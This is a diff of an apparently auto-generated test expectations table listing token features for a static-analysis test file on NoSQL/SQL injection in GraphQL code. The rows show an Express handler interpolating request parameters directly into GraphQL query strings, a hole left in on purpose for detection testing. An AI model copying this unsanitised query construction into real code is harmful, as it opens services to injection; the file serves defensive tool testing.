autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:59:58:76 | query: `foo ${id}` | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:59:58:76 | query: `foo ${id}` | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:59:58:76 | query: `foo ${id}` | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:59:58:76 | query: `foo ${id}` | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:59:58:76 | query: `foo ${id}` | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:59:58:76 | query: `foo ${id}` | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:59:58:76 | query: `foo ${id}` | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:59:58:76 | query: `foo ${id}` | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:59:58:76 | query: `foo ${id}` | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:66:58:76 | `foo ${id}` | CalleeFlexibleAccessPath | kit2.request | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:66:58:76 | `foo ${id}` | InputAccessPathFromCallee | 1.query | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:66:58:76 | `foo ${id}` | InputArgumentIndex | 1 | @@ -392,12 +2400,139 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:66:58:76 | `foo ${id}` | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:66:58:76 | `foo ${id}` | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:66:58:76 | `foo ${id}` | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:67:58:70 | foo | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:67:58:70 | foo | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:67:58:70 | foo | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:67:58:70 | foo | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:67:58:70 | foo | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:67:58:70 | foo | stringConcatenatedWith | -endpoint- id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:73:58:74 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:73:58:74 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:73:58:74 | id | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:73:58:74 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:73:58:74 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:73:58:74 | id | stringConcatenatedWith | 'foo ' -endpoint- | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:1:61:65 | import ... aphql'; | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:1:61:65 | import ... aphql'; | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:1:61:65 | import ... aphql'; | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:10:61:16 | graphql | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:10:61:16 | graphql | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:10:61:16 | graphql | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:10:61:33 | graphql ... Graphql | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:10:61:33 | graphql ... Graphql | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:10:61:33 | graphql ... Graphql | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:10:61:33 | nativeGraphql | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:10:61:33 | nativeGraphql | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:10:61:33 | nativeGraphql | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:21:61:33 | nativeGraphql | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:21:61:33 | nativeGraphql | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:21:61:33 | nativeGraphql | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:21:61:33 | nativeGraphql | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:36:61:46 | buildSchema | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:36:61:46 | buildSchema | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:36:61:46 | buildSchema | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:36:61:46 | buildSchema | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:36:61:46 | buildSchema | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:36:61:46 | buildSchema | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:36:61:46 | buildSchema | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:36:61:46 | buildSchema | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:36:61:46 | buildSchema | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:36:61:46 | buildSchema | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:36:61:46 | buildSchema | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:36:61:46 | buildSchema | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:56:61:64 | 'graphql' | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:56:61:64 | 'graphql' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:61:56:61:64 | 'graphql' | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:5:62:10 | schema | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:5:62:10 | schema | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:5:62:10 | schema | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:5:62:10 | schema | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:5:66:2 | schema | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:5:66:2 | schema | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:5:66:2 | schema | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:5:66:2 | schema ... \\n }\\n`) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:5:66:2 | schema ... \\n }\\n`) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:5:66:2 | schema ... \\n }\\n`) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:14:62:24 | buildSchema | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:14:62:24 | buildSchema | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:14:62:24 | buildSchema | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:14:66:2 | buildSc ... \\n }\\n`) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:14:66:2 | buildSc ... \\n }\\n`) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:14:66:2 | buildSc ... \\n }\\n`) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:14:66:2 | exceptional return of buildSc ... \\n }\\n`) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:14:66:2 | exceptional return of buildSc ... \\n }\\n`) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:14:66:2 | exceptional return of buildSc ... \\n }\\n`) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:26:66:1 | `\\n typ ... g\\n }\\n` | CalleeFlexibleAccessPath | buildSchema | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:26:66:1 | `\\n typ ... g\\n }\\n` | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:26:66:1 | `\\n typ ... g\\n }\\n` | calleeImports | graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:26:66:1 | `\\n typ ... g\\n }\\n` | contextFunctionInterfaces | hello() | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:26:66:1 | `\\n typ ... g\\n }\\n` | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:26:66:1 | `\\n typ ... g\\n }\\n` | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:27:66:0 | \\n type ... ng\\n }\\n | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:27:66:0 | \\n type ... ng\\n }\\n | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:27:66:0 | \\n type ... ng\\n }\\n | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:62:27:66:0 | \\n type ... ng\\n }\\n | stringConcatenatedWith | -endpoint- | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:67:5:67:8 | root | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:67:5:67:8 | root | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:67:5:67:8 | root | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:67:5:67:8 | root | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:67:5:71:1 | root | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:67:5:71:1 | root | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:67:5:71:1 | root | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:67:5:71:1 | root = ... \\n },\\n} | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:67:5:71:1 | root = ... \\n },\\n} | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:67:5:71:1 | root = ... \\n },\\n} | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:67:12:71:1 | {\\n hel ... \\n },\\n} | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:67:12:71:1 | {\\n hel ... \\n },\\n} | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:67:12:71:1 | {\\n hel ... \\n },\\n} | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:3:68:7 | hello | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:3:68:7 | hello | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:3:68:7 | hello | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:3:70:3 | hello: ... !';\\n } | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:3:70:3 | hello: ... !';\\n } | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:3:70:3 | hello: ... !';\\n } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:3:70:3 | hello: ... !';\\n } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:3:70:3 | hello: ... !';\\n } | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:3:70:3 | hello: ... !';\\n } | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:10:70:3 | 'arguments' object of method hello | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:10:70:3 | 'arguments' object of method hello | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:10:70:3 | 'arguments' object of method hello | enclosingFunctionBody | Hello world! | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:10:70:3 | 'arguments' object of method hello | enclosingFunctionName | hello | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:10:70:3 | 'arguments' object of method hello | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:10:70:3 | () => { ... !';\\n } | assignedToPropName | hello | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:10:70:3 | () => { ... !';\\n } | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:10:70:3 | () => { ... !';\\n } | contextSurroundingFunctionParameters | () | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:10:70:3 | () => { ... !';\\n } | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:10:70:3 | exceptional return of method hello | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:10:70:3 | exceptional return of method hello | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:10:70:3 | exceptional return of method hello | enclosingFunctionBody | Hello world! | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:10:70:3 | exceptional return of method hello | enclosingFunctionName | hello | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:10:70:3 | exceptional return of method hello | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:10:70:3 | return of method hello | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:10:70:3 | return of method hello | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:10:70:3 | return of method hello | enclosingFunctionBody | Hello world! | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:10:70:3 | return of method hello | enclosingFunctionName | hello | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:68:10:70:3 | return of method hello | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:69:12:69:25 | 'Hello world!' | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:69:12:69:25 | 'Hello world!' | contextSurroundingFunctionParameters | () | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:69:12:69:25 | 'Hello world!' | enclosingFunctionBody | Hello world! | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:69:12:69:25 | 'Hello world!' | enclosingFunctionName | hello | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:69:12:69:25 | 'Hello world!' | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:1:73:3 | app | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:1:73:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:1:73:3 | app | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:1:73:7 | app.get | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:1:73:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:1:73:7 | app.get | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:1:113:2 | app.get ... })\\n}) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:1:113:2 | app.get ... })\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:1:113:2 | app.get ... })\\n}) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:1:113:2 | exceptional return of app.get ... })\\n}) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:1:113:2 | exceptional return of app.get ... })\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:1:113:2 | exceptional return of app.get ... })\\n}) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:5:73:7 | get | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:5:73:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:5:73:7 | get | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:9:73:20 | '/thing/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:9:73:20 | '/thing/:id' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:9:73:20 | '/thing/:id' | calleeImports | express | @@ -405,6 +2540,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:9:73:20 | '/thing/:id' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:9:73:20 | '/thing/:id' | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:9:73:20 | '/thing/:id' | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:73:22 | nativeGraphql | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:73:22 | nativeGraphql | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:73:22 | nativeGraphql | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:73:22 | nativeGraphql | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:73:22 | nativeGraphql | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:73:22 | root | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:73:22 | root | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:73:22 | root | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:73:22 | root | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:73:22 | root | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:73:22 | schema | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:73:22 | schema | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:73:22 | schema | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:73:22 | schema | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:73:22 | schema | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:73:22 | this | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:73:22 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:73:22 | this | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:73:22 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:73:22 | this | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:113:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:113:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:113:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:113:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:113:1 | 'arguments' object of anonymous function | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:113:1 | async f ... \\n })\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:113:1 | async f ... \\n })\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:113:1 | async f ... \\n })\\n} | calleeImports | express | @@ -412,6 +2572,101 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:113:1 | async f ... \\n })\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:113:1 | async f ... \\n })\\n} | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:113:1 | async f ... \\n })\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:113:1 | exceptional return of anonymous function | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:113:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:113:1 | exceptional return of anonymous function | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:113:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:113:1 | exceptional return of anonymous function | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:113:1 | return of anonymous function | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:113:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:73:23:113:1 | return of anonymous function | enclosingFunctionBody | req res id req query id result nativeGraphql schema { foo id } root fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n id \n }\n } fetch https://my-grpahql-server.com/graphql method POST headers Content-Type application/json body JSON stringify query {\n thing {\n name\n url\n $id\n }\n } variables id id | +| 